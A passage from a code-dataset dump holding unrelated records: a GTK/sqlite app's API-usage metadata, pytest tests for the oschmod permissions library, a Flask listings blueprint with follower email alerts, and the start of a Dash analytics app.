"gi.repository.Gtk", "line_number": 47, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 51, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 51, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 55, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 55, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 59, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 59, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 73, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 73, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 79, "usage_type": "call"}, {"api_name": "sqlite3.Row", "line_number": 80, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 92, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 92, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ListBox", "line_number": 101, "usage_type": "call"}, {"api_name": 
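# A self-contained sketch of the sqlite3 idioms the GTK record above leans
# on: sqlite3.Row enables name-based column access, and `?` placeholders keep
# every query parameterized. Table and values here are illustrative only.
import sqlite3

conn = sqlite3.connect(":memory:")              # throwaway in-memory DB
conn.row_factory = sqlite3.Row
cur = conn.cursor()
cur.execute("CREATE TABLE album(nazwa TEXT, art TEXT)")
cur.execute("INSERT INTO album(nazwa, art) VALUES(?, ?)",
            ("Kind of Blue", "Miles Davis"))
conn.commit()
cur.execute("SELECT * FROM album WHERE art = ?", ("Miles Davis",))
for row in cur.fetchall():
    print(row["nazwa"], row["art"])             # dict-style access via Row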
"gi.repository.Gtk", "line_number": 101, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 102, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 102, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ListBox", "line_number": 103, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 103, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 104, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 104, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 108, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 108, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ListBox", "line_number": 114, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 114, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 115, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 115, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 119, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 119, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ListBox", "line_number": 144, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 144, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 145, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 145, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ListBox", "line_number": 146, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 146, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 147, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 147, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 151, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 151, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 156, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 156, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Window.__init__", "line_number": 159, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 159, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 159, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Grid", "line_number": 162, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 162, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 167, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 167, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 168, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 168, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 169, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 169, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 172, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 172, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 173, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 173, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 175, "usage_type": "call"}, 
{"api_name": "gi.repository.Gtk", "line_number": 175, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 177, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 177, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 181, "usage_type": "call"}, {"api_name": "sqlite3.Row", "line_number": 182, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 199, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 199, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Window.__init__", "line_number": 202, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 202, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 202, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Grid", "line_number": 205, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 205, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 210, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 210, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 214, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 214, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 216, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 216, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 220, "usage_type": "call"}, {"api_name": "sqlite3.Row", "line_number": 221, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 229, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 229, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Window.__init__", "line_number": 232, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 232, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 232, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Grid", "line_number": 235, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 235, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 240, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 240, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 241, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 241, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 243, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 243, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 245, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 245, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 247, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 247, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 251, "usage_type": "call"}, {"api_name": "sqlite3.Row", "line_number": 252, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 261, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 261, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Window.__init__", "line_number": 264, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 264, "usage_type": "attribute"}, {"api_name": 
"gi.repository.Gtk", "line_number": 264, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Grid", "line_number": 267, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 267, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 272, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 272, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 275, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 275, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 277, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 277, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 281, "usage_type": "call"}, {"api_name": "sqlite3.Row", "line_number": 282, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.main_quit", "line_number": 292, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 292, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.main", "line_number": 294, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 294, "usage_type": "name"}]} +{"seq_id": "434106652", "text": "# -*- coding: utf-8 -*-\n# pylint: disable=redefined-outer-name\n\"\"\"test_oschmod module.\"\"\"\nimport glob\nimport os\nimport random\nimport shutil\nimport stat\nimport string\nimport time\n\nimport oschmod\n\n\ndef test_permissions():\n \"\"\"Tests for stuff.\"\"\"\n test_dir = \"tests\"\n path = os.path.join(test_dir, ''.join(\n random.choice(string.ascii_letters) for i in range(10)) + '.txt')\n file_hdl = open(path, 'w+')\n file_hdl.write(path)\n file_hdl.close()\n oschmod.set_mode(path, stat.S_IRUSR | stat.S_IWUSR)\n assert oschmod.get_mode(path) == stat.S_IRUSR | stat.S_IWUSR\n\n path = os.path.join(test_dir, ''.join(\n random.choice(string.ascii_letters) for i in range(10)) + '.txt')\n file_hdl = open(path, 'w+')\n file_hdl.write(path)\n file_hdl.close()\n mode = stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | \\\n stat.S_IWGRP | stat.S_IROTH | stat.S_IWOTH\n oschmod.set_mode(path, mode)\n assert oschmod.get_mode(path) == mode\n\n path = os.path.join(test_dir, ''.join(\n random.choice(string.ascii_letters) for i in range(10)) + '.txt')\n file_hdl = open(path, 'w+')\n file_hdl.write(path)\n file_hdl.close()\n mode = stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | \\\n stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | \\\n stat.S_IXOTH\n oschmod.set_mode(path, mode)\n assert oschmod.get_mode(path) == mode\n\n file_list = glob.glob(os.path.join(test_dir, \"*txt\"))\n for file_path in file_list:\n try:\n os.remove(file_path)\n except FileNotFoundError:\n print(\"Error while deleting file : \", file_path)\n\n\ndef test_set_recursive():\n \"\"\"Check file permissions are recursively set.\"\"\"\n # create dirs\n topdir = 'testdir1'\n testdir = os.path.join(topdir, 'testdir2', 'testdir3')\n os.makedirs(testdir)\n\n # create files\n fileh = open(os.path.join(topdir, 'file1'), \"w+\")\n fileh.write(\"contents\")\n fileh.close()\n\n fileh = open(os.path.join(testdir, 'file2'), \"w+\")\n fileh.write(\"contents\")\n fileh.close()\n\n # set permissions to badness\n triple7 = stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP\\\n | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH\\\n | stat.S_IXOTH\n oschmod.set_mode(topdir, triple7)\n oschmod.set_mode(testdir, triple7)\n oschmod.set_mode(os.path.join(topdir, 'file1'), triple7)\n 
oschmod.set_mode(os.path.join(testdir, 'file2'), triple7)\n time.sleep(1) # modes aren't always ready to go immediately\n\n # set permissions - the test\n file_mode = 0o600\n dir_mode = 0o700\n oschmod.set_mode_recursive(topdir, file_mode, dir_mode)\n time.sleep(1) # modes aren't always ready to go immediately\n\n # check it out\n assert oschmod.get_mode(topdir) == dir_mode\n assert oschmod.get_mode(os.path.join(topdir, 'testdir2')) == dir_mode\n assert oschmod.get_mode(testdir) == dir_mode\n assert oschmod.get_mode(os.path.join(topdir, 'file1')) == file_mode\n assert oschmod.get_mode(os.path.join(testdir, 'file2')) == file_mode\n\n # clean up\n shutil.rmtree(topdir)\n", "sub_path": "tests/test_oschmod.py", "file_name": "test_oschmod.py", "file_ext": "py", "file_size_in_byte": 3122, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 19, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 19, "usage_type": "attribute"}, {"api_name": "oschmod.set_mode", "line_number": 23, "usage_type": "call"}, {"api_name": "stat.S_IRUSR", "line_number": 23, "usage_type": "attribute"}, {"api_name": "stat.S_IWUSR", "line_number": 23, "usage_type": "attribute"}, {"api_name": "oschmod.get_mode", "line_number": 24, "usage_type": "call"}, {"api_name": "stat.S_IRUSR", "line_number": 24, "usage_type": "attribute"}, {"api_name": "stat.S_IWUSR", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 27, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 27, "usage_type": "attribute"}, {"api_name": "stat.S_IRUSR", "line_number": 31, "usage_type": "attribute"}, {"api_name": "stat.S_IWUSR", "line_number": 31, "usage_type": "attribute"}, {"api_name": "stat.S_IXUSR", "line_number": 31, "usage_type": "attribute"}, {"api_name": "stat.S_IRGRP", "line_number": 31, "usage_type": "attribute"}, {"api_name": "stat.S_IWGRP", "line_number": 32, "usage_type": "attribute"}, {"api_name": "stat.S_IROTH", "line_number": 32, "usage_type": "attribute"}, {"api_name": "stat.S_IWOTH", "line_number": 32, "usage_type": "attribute"}, {"api_name": "oschmod.set_mode", "line_number": 33, "usage_type": "call"}, {"api_name": "oschmod.get_mode", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 37, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 37, "usage_type": "attribute"}, {"api_name": "stat.S_IRUSR", "line_number": 41, "usage_type": "attribute"}, {"api_name": "stat.S_IWUSR", "line_number": 41, "usage_type": "attribute"}, {"api_name": "stat.S_IXUSR", "line_number": 41, "usage_type": "attribute"}, {"api_name": "stat.S_IRGRP", "line_number": 41, "usage_type": "attribute"}, {"api_name": "stat.S_IWGRP", "line_number": 42, "usage_type": "attribute"}, {"api_name": "stat.S_IXGRP", "line_number": 42, "usage_type": "attribute"}, {"api_name": "stat.S_IROTH", "line_number": 42, "usage_type": "attribute"}, {"api_name": "stat.S_IWOTH", "line_number": 42, "usage_type": "attribute"}, {"api_name": 
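# Aside on the mode arithmetic in the test_oschmod record above: the stat
# flags are bit masks of the usual octal permissions, so the composed
# "triple7" value is exactly 0o777 and S_IRUSR|S_IWUSR is 0o600.
import stat

assert stat.S_IRUSR | stat.S_IWUSR == 0o600                   # rw-------
assert (stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO) == 0o777  # rwxrwxrwx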
"stat.S_IXOTH", "line_number": 43, "usage_type": "attribute"}, {"api_name": "oschmod.set_mode", "line_number": 44, "usage_type": "call"}, {"api_name": "oschmod.get_mode", "line_number": 45, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "stat.S_IRUSR", "line_number": 72, "usage_type": "attribute"}, {"api_name": "stat.S_IWUSR", "line_number": 72, "usage_type": "attribute"}, {"api_name": "stat.S_IXUSR", "line_number": 72, "usage_type": "attribute"}, {"api_name": "stat.S_IRGRP", "line_number": 72, "usage_type": "attribute"}, {"api_name": "stat.S_IWGRP", "line_number": 73, "usage_type": "attribute"}, {"api_name": "stat.S_IXGRP", "line_number": 73, "usage_type": "attribute"}, {"api_name": "stat.S_IROTH", "line_number": 73, "usage_type": "attribute"}, {"api_name": "stat.S_IWOTH", "line_number": 73, "usage_type": "attribute"}, {"api_name": "stat.S_IXOTH", "line_number": 74, "usage_type": "attribute"}, {"api_name": "oschmod.set_mode", "line_number": 75, "usage_type": "call"}, {"api_name": "oschmod.set_mode", "line_number": 76, "usage_type": "call"}, {"api_name": "oschmod.set_mode", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "oschmod.set_mode", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "oschmod.set_mode_recursive", "line_number": 84, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 85, "usage_type": "call"}, {"api_name": "oschmod.get_mode", "line_number": 88, "usage_type": "call"}, {"api_name": "oschmod.get_mode", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "oschmod.get_mode", "line_number": 90, "usage_type": "call"}, {"api_name": "oschmod.get_mode", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "oschmod.get_mode", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "48637442", "text": "from flask import Blueprint, render_template, redirect, url_for, current_app\nfrom app.models import Item, Listing, db\nfrom app.forms import ItemForm, ListingForm, 
User\nfrom flask_login import current_user, login_required\nfrom flask_mail import Message\nimport os\n\nlistings = Blueprint('listings', __name__, template_folder=\"templates\")\n\n@listings.route('/items/all', methods=['GET', 'POST'])\ndef allitems():\n form = ItemForm()\n if form.validate_on_submit():\n if current_user.is_authenticated:\n item = Item(name=form.name.data, image=form.image.data)\n db.session.add(item)\n db.session.commit()\n item_list = Item.query.all()\n return render_template(\"listings/items.html\", title=\"Nontrivial - All Items\", keyword=\"\", form=form, items=item_list)\n\n@listings.route('/items/search/<keyword>', methods=['GET', 'POST'])\ndef search(keyword):\n form = ItemForm()\n if form.validate_on_submit():\n if current_user.is_authenticated:\n item = Item(name=form.name.data, image=form.image.data)\n db.session.add(item)\n db.session.commit()\n item_list = Item.query.filter_by(name=keyword).all()\n return render_template(\"listings/items.html\", title=\"Nontrivial - Search\", keyword=keyword, form=form, items=item_list)\n\ndef send_updates(item):\n from app import mail\n followers = item.followers\n if len(followers) > 0:\n # used to send mail in bulk\n # keeps the mail object connected until all messages are sent\n with mail.connect() as conn:\n for follower in followers: \n message = Message(\"Nontrivial Item Listing Alert\", sender=os.environ.get('FLASKEMAIL'), recipients=[follower.email])\n \n # open a file and attach to message\n with current_app.open_resource(\"templates/mail/new_listing.html\") as fp:\n message.attach(\"new_listing.html\",\"text/html\", fp.read())\n\n message.html = render_template('mail/new_listing.html', user=follower, item=item, link=url_for('listings.view_item', item_id=item.id))\n conn.send(message) # not mail.send(message)\n\n@listings.route('/items/item/<item_id>', methods=['GET', 'POST'])\ndef view_item(item_id):\n form = ListingForm()\n if form.validate_on_submit():\n if current_user.is_authenticated:\n item = Item.query.filter_by(id=item_id).first()\n listing = Listing(name=form.name.data, description=form.description.data, image=form.image.data, price=form.price.data, owner=current_user, item=item)\n db.session.add(listing)\n db.session.commit()\n send_updates(item)\n item = Item.query.filter_by(id=item_id).first()\n listings = item.item_listings\n return render_template(\"listings/item.html\", title=\"Nontrivial - \"+item.name, item=item, listings=listings, form=form)\n\n@listings.route('/items/listing/remove/<listing_id>', methods=['POST'])\n@login_required\ndef remove_listing(listing_id):\n listing = db.session.query(Listing).filter(Listing.id==listing_id).first()\n item_id = listing.item.id\n db.session.delete(listing)\n db.session.commit()\n return redirect(url_for('listings.view_item', item_id=item_id))\n\n@listings.route('/items/follow/<item_id>', methods=['POST'])\n@login_required\ndef follow(item_id):\n item = Item.query.filter_by(id=item_id).first()\n current_user.following.append(item)\n db.session.commit()\n return redirect(url_for('listings.view_item', item_id=item_id))\n\n@listings.route('/items/unfollow/<item_id>', methods=['POST'])\n@login_required\ndef unfollow(item_id):\n item = Item.query.filter_by(id=item_id).first()\n current_user.following.remove(item)\n db.session.commit()\n return redirect(url_for('listings.view_item', item_id=item_id))", "sub_path": "nontrivial/app/core/listings.py", "file_name": "listings.py", "file_ext": "py", "file_size_in_byte": 3827, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", 
"pt": "13", "api": [{"api_name": "flask.Blueprint", "line_number": 8, "usage_type": "call"}, {"api_name": "app.forms.ItemForm", "line_number": 12, "usage_type": "call"}, {"api_name": "flask_login.current_user.is_authenticated", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 14, "usage_type": "name"}, {"api_name": "app.models.Item", "line_number": 15, "usage_type": "call"}, {"api_name": "app.models.db.session.add", "line_number": 16, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 16, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 16, "usage_type": "name"}, {"api_name": "app.models.db.session.commit", "line_number": 17, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 17, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 17, "usage_type": "name"}, {"api_name": "app.models.Item.query.all", "line_number": 18, "usage_type": "call"}, {"api_name": "app.models.Item.query", "line_number": 18, "usage_type": "attribute"}, {"api_name": "app.models.Item", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 19, "usage_type": "call"}, {"api_name": "app.forms.ItemForm", "line_number": 23, "usage_type": "call"}, {"api_name": "flask_login.current_user.is_authenticated", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 25, "usage_type": "name"}, {"api_name": "app.models.Item", "line_number": 26, "usage_type": "call"}, {"api_name": "app.models.db.session.add", "line_number": 27, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 27, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 27, "usage_type": "name"}, {"api_name": "app.models.db.session.commit", "line_number": 28, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 28, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 28, "usage_type": "name"}, {"api_name": "app.models.Item.query.filter_by", "line_number": 29, "usage_type": "call"}, {"api_name": "app.models.Item.query", "line_number": 29, "usage_type": "attribute"}, {"api_name": "app.models.Item", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 30, "usage_type": "call"}, {"api_name": "app.mail.connect", "line_number": 38, "usage_type": "call"}, {"api_name": "app.mail", "line_number": 38, "usage_type": "name"}, {"api_name": "flask_mail.Message", "line_number": 40, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 40, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.current_app.open_resource", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.current_app", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 46, "usage_type": "call"}, {"api_name": "app.forms.ListingForm", "line_number": 51, "usage_type": "call"}, {"api_name": "flask_login.current_user.is_authenticated", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 53, "usage_type": "name"}, {"api_name": "app.models.Item.query.filter_by", "line_number": 54, "usage_type": "call"}, {"api_name": "app.models.Item.query", "line_number": 54, "usage_type": "attribute"}, {"api_name": "app.models.Item", 
"line_number": 54, "usage_type": "name"}, {"api_name": "app.models.Listing", "line_number": 55, "usage_type": "call"}, {"api_name": "flask_login.current_user", "line_number": 55, "usage_type": "name"}, {"api_name": "app.models.db.session.add", "line_number": 56, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 56, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 56, "usage_type": "name"}, {"api_name": "app.models.db.session.commit", "line_number": 57, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 57, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 57, "usage_type": "name"}, {"api_name": "app.models.Item.query.filter_by", "line_number": 59, "usage_type": "call"}, {"api_name": "app.models.Item.query", "line_number": 59, "usage_type": "attribute"}, {"api_name": "app.models.Item", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}, {"api_name": "app.models.db.session.query", "line_number": 66, "usage_type": "call"}, {"api_name": "app.models.Listing", "line_number": 66, "usage_type": "argument"}, {"api_name": "app.models.db.session", "line_number": 66, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 66, "usage_type": "name"}, {"api_name": "app.models.Listing.id", "line_number": 66, "usage_type": "attribute"}, {"api_name": "app.models.db.session.delete", "line_number": 68, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 68, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 68, "usage_type": "name"}, {"api_name": "app.models.db.session.commit", "line_number": 69, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 69, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 69, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 70, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 64, "usage_type": "name"}, {"api_name": "app.models.Item.query.filter_by", "line_number": 75, "usage_type": "call"}, {"api_name": "app.models.Item.query", "line_number": 75, "usage_type": "attribute"}, {"api_name": "app.models.Item", "line_number": 75, "usage_type": "name"}, {"api_name": "flask_login.current_user.following.append", "line_number": 76, "usage_type": "call"}, {"api_name": "flask_login.current_user.following", "line_number": 76, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 76, "usage_type": "name"}, {"api_name": "app.models.db.session.commit", "line_number": 77, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 77, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 77, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 78, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 73, "usage_type": "name"}, {"api_name": "app.models.Item.query.filter_by", "line_number": 83, "usage_type": "call"}, {"api_name": "app.models.Item.query", "line_number": 83, "usage_type": "attribute"}, {"api_name": "app.models.Item", "line_number": 83, "usage_type": "name"}, {"api_name": "flask_login.current_user.following.remove", "line_number": 84, "usage_type": "call"}, {"api_name": "flask_login.current_user.following", 
"line_number": 84, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 84, "usage_type": "name"}, {"api_name": "app.models.db.session.commit", "line_number": 85, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 85, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 86, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 81, "usage_type": "name"}]} +{"seq_id": "349454926", "text": "import sys\n#sys.path.append('/Users/md/Downloads/cc_f20')\n\n\n__author__ = 'CountingChickens'\n\nfrom dash import Dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport dash_table\n\nimport pandas as pd\n\nfrom flask import Flask, render_template, request, session, make_response\n\napp = Flask(__name__) # '__main__'\n\n\napp_dash = Dash(__name__,\n server=app,\n url_base_pathname='/')\n\n\npath='data/'\n\ndf_tpc=pd.read_csv(f'{path}AI_topics.csv', index_col=0)\nselected_topics=[tpc.lower() for tpc in df_tpc.index.values]\n\ndf_aut=pd.read_csv(f'{path}AI_authors.csv', index_col=0)\ndf_tim=pd.read_csv(f'{path}AI_time.csv', index_col=0)\ndf_txt=pd.read_csv(f'{path}AI_body.csv', index_col=0)\ndf_txt=df_txt.rename(columns={'Favorite Count': 'Favs','Retweet Count': 